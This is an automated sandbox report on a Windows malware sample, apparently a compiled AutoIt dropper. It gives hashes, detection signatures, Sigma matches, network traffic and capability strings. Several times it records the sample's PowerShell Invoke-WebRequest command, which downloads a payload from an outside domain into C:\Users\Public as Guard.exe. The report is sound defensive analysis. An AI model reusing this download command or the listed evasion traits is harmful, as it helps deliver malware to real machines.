Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
elyho3x5zz.exe

Overview

General Information

Sample name:elyho3x5zz.exe
renamed because original name is a hash value
Original sample name:69931884c719a49700d9b1921e915ed0.exe
Analysis ID:1584333
MD5:69931884c719a49700d9b1921e915ed0
SHA1:9d01852540ef12d782a18f0aae776a4af90be433
SHA256:d438f531f435c04c139ff9895885a3bc721958fde5354d738bb928b1899e5693
Tags:exeuser-abuse_ch
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Performs DNS queries to domains with low reputation
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • elyho3x5zz.exe (PID: 3536 cmdline: "C:\Users\user\Desktop\elyho3x5zz.exe" MD5: 69931884C719A49700D9B1921E915ED0)
    • powershell.exe (PID: 4996 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\elyho3x5zz.exe", ParentImage: C:\Users\user\Desktop\elyho3x5zz.exe, ParentProcessId: 3536, ParentProcessName: elyho3x5zz.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4996, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\elyho3x5zz.exe", ParentImage: C:\Users\user\Desktop\elyho3x5zz.exe, ParentProcessId: 3536, ParentProcessName: elyho3x5zz.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4996, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\elyho3x5zz.exe", ParentImage: C:\Users\user\Desktop\elyho3x5zz.exe, ParentProcessId: 3536, ParentProcessName: elyho3x5zz.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4996, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\elyho3x5zz.exe", ParentImage: C:\Users\user\Desktop\elyho3x5zz.exe, ParentProcessId: 3536, ParentProcessName: elyho3x5zz.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4996, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T08:44:51.281623+010018100002Potentially Bad Traffic192.168.2.549704188.114.96.3443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: elyho3x5zz.exeVirustotal: Detection: 55%Perma Link
Source: elyho3x5zz.exeReversingLabs: Detection: 39%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: elyho3x5zz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF73A24C7C0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF73A24BC70
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2571F4 FindFirstFileW,FindClose,0_2_00007FF73A2571F4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2572A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF73A2572A8
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF73A24B7C0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A212F50 FindFirstFileExW,0_2_00007FF73A212F50
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A25A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF73A25A350
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A256428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF73A256428
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A25A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF73A25A4F8
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A25A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF73A25A874

Networking

barindex
Source: DNS query: bdfhbrgrg.xyz
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 188.114.96.3:443
Source: global trafficHTTP traffic detected: GET /ImldXigH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bdfhbrgrg.xyzConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A25E968 InternetQueryDataAvailable,InternetReadFile,0_2_00007FF73A25E968
Source: global trafficHTTP traffic detected: GET /ImldXigH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bdfhbrgrg.xyzConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: bdfhbrgrg.xyz
Source: elyho3x5zz.exe, 00000000.00000002.2466117673.00000230D77B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bdfhbrgrg.xyz/ImldXigH
Source: elyho3x5zz.exe, 00000000.00000002.2465910493.00000230D7778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bdfhbrgrg.xyz/yajwgWMT.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A260A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF73A260A6C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A260D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF73A260D24
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A260A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF73A260A6C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A247BA0 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00007FF73A247BA0

System Summary

barindex
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: This is a third-party compiled AutoIt script.0_2_00007FF73A1D37B0
Source: elyho3x5zz.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: elyho3x5zz.exe, 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_58584a3b-2
Source: elyho3x5zz.exe, 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*$:memstr_54209ef6-d
Source: elyho3x5zz.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e39eee00-b
Source: elyho3x5zz.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_25adb7bb-a
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24BF80: CreateFileW,DeviceIoControl,CloseHandle,0_2_00007FF73A24BF80
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A23D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_00007FF73A23D2C4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00007FF73A24D750
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A27DB180_2_00007FF73A27DB18
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1E3C200_2_00007FF73A1E3C20
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A20793C0_2_00007FF73A20793C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A27BA0C0_2_00007FF73A27BA0C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1DB9F00_2_00007FF73A1DB9F0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1EFA4F0_2_00007FF73A1EFA4F
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A251A180_2_00007FF73A251A18
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1D5F3C0_2_00007FF73A1D5F3C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A26206C0_2_00007FF73A26206C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1DBE700_2_00007FF73A1DBE70
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1FBEB40_2_00007FF73A1FBEB4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1DB3900_2_00007FF73A1DB390
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2632AC0_2_00007FF73A2632AC
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A21529C0_2_00007FF73A21529C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2017500_2_00007FF73A201750
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2817C00_2_00007FF73A2817C0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1D183C0_2_00007FF73A1D183C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2118400_2_00007FF73A211840
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24D87C0_2_00007FF73A24D87C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1E58D00_2_00007FF73A1E58D0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1FF8D00_2_00007FF73A1FF8D0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2095B00_2_00007FF73A2095B0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2656A00_2_00007FF73A2656A0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1D2AE00_2_00007FF73A1D2AE0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2030DC0_2_00007FF73A2030DC
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A212D200_2_00007FF73A212D20
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A216DE40_2_00007FF73A216DE4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1E2E300_2_00007FF73A1E2E30
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A27CE8C0_2_00007FF73A27CE8C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F0E900_2_00007FF73A1F0E90
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1E0E700_2_00007FF73A1E0E70
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2683600_2_00007FF73A268360
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2583D40_2_00007FF73A2583D4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1FC3FC0_2_00007FF73A1FC3FC
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2124000_2_00007FF73A212400
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2084C00_2_00007FF73A2084C0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F45140_2_00007FF73A1F4514
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1FC1300_2_00007FF73A1FC130
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F02C40_2_00007FF73A1F02C4
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2167F00_2_00007FF73A2167F0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A20A8A00_2_00007FF73A20A8A0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A27A59C0_2_00007FF73A27A59C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A27C6D40_2_00007FF73A27C6D4
Source: classification engineClassification label: mal76.troj.evad.winEXE@4/4@1/1
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A253778 GetLastError,FormatMessageW,0_2_00007FF73A253778
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A23D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00007FF73A23D5CC
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A23CCE0 AdjustTokenPrivileges,CloseHandle,0_2_00007FF73A23CCE0
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A2559D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_00007FF73A2559D8
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A24BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF73A24BE00
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A255F2C CoInitialize,CoCreateInstance,CoUninitialize,0_2_00007FF73A255F2C
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1D6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00007FF73A1D6580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycgw4vc1.xjq.ps1Jump to behavior
Source: elyho3x5zz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\elyho3x5zz.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: elyho3x5zz.exeVirustotal: Detection: 55%
Source: elyho3x5zz.exeReversingLabs: Detection: 39%
Source: unknownProcess created: C:\Users\user\Desktop\elyho3x5zz.exe "C:\Users\user\Desktop\elyho3x5zz.exe"
Source: C:\Users\user\Desktop\elyho3x5zz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\elyho3x5zz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\elyho3x5zz.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
